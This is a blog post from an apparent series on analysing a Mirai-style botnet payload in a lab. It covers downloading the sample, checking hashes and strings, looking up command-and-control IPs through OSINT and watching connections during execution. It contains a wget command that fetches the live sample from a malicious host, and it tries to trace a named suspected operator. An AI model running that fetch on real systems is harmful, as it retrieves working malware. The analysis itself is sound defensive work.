2 Hour Malware Analysis

In the previous post, we saw a US-hosted Chinese IP address being used to launch attacks against US infrastructure. We also saw an unrelated IP address using a form of dropper malware by attempting to install additional payloads. In this post, we will analyze one of the second payloads retrieved by the dropper malware.

First, we will set up our malware analysis environment. We do not want to accidentally execute live malware on an unprepared machine, which is a real risk in this scenario.

Having already downloaded the SANS-SIFT workstation as our malware analysis lab and taken a snapshop prior to this project, we follow a modified version of the example from the book Learning Malware Analysis by Monnappa K. A:

1. download the malicious payload and take at look at known intel, before modifying permissions to make it executable.
2. We use the following command to download the file into our environment, but not execute it:

wget http://31.210.20.138/uwu/x86

3. change the Guest VM to a host-only network and reboot before executing the malware

Running the malware retrieval link through virus total reveals that this is a known malware repository:

We also take a look at AlienVault’s assessment of this piece of software by searching the hash value.

Was first reported February 13, 2021, possibly newer malware?

Android specific malware

We also search Alienvault, to see what analysis it has available.

We start to get a better picture of it’s intended purpose: to add this “android machine” to a Mirai botnet

Second, we take a look at some of the features and behavior of x86.

The following commands yield the following results:

file x86

ELF executable type

sha256sum x86

matches the known malware sample from earlier

strings x86 (selected results, ignored the many inappropriate variable names)

I found 3 main pieces of information in the extracted strings: possible shellcode, a first IP address, and a second IP address with attribution. Using these pieces of information, I took a look at finding out more concerning these IP addresses and who may be behind them.

may be shellcode, repeating segments of “38FJ93ID9A”;possibly double encoded or obfuscated somehow..

the first extracted IP string

Hostwinds LLC is the owner of this IP address

navigating to this IP address reveals it is web accessible

Censys reveals a little more info about if https is running.

This IP address hosts HTTPS on port 8444.

https pre-pended

Several hits from Spiderfoot regarding known malicious behavior from a known malicious subnet.

We also see an interesting second IP address.

a botnet indeed

Also a known malicious IP address with malicious behavior

This particular IP address is owned by VolumeDrive

Investigating this IP address further reveals a few more pieces of information. I used Spiderfoot, a resource that aggregates known OSINT intel for a given IP address. I also imported several API keys to maximize available data.

Spiderfoot locates this IP address to Encino, CA

Host for this IP address, according to spiderfoot

The first address is a UPS store.

Pennsylvania address is a UPS Store

Now we look at who greek helios may be.

Greek Helios Youtube channel. Has videos demonstrating the use of a botnet.

Not much information on the individual, so I attempt to find metadata on his photo.

running exiftool does not reveal much additional info on his/her profile photo

Inspect element in browser shows the profile photo’s origin to be from:

https://yt3.ggpht.com/ytc/AAUvwngOiMrhzA4OSOEbkjopjMrjf0kZMsykwNqJ9MHiXA=s88-c-k-c0x00ffffff-no-rj

In a lab environment, upon execution, a strange statement is printed to console.

don’t catch all the malware

Running netstat -pant shows an established connection to what is likely a C2 center at one of the previously extracted IP addresses

After disappearing, connection reappears after killing the first process, yet disappears later

Alienvault reveals the user of this malware to be DDoS-focused.

In our final post, we will disassemble this malware using some open-source tools.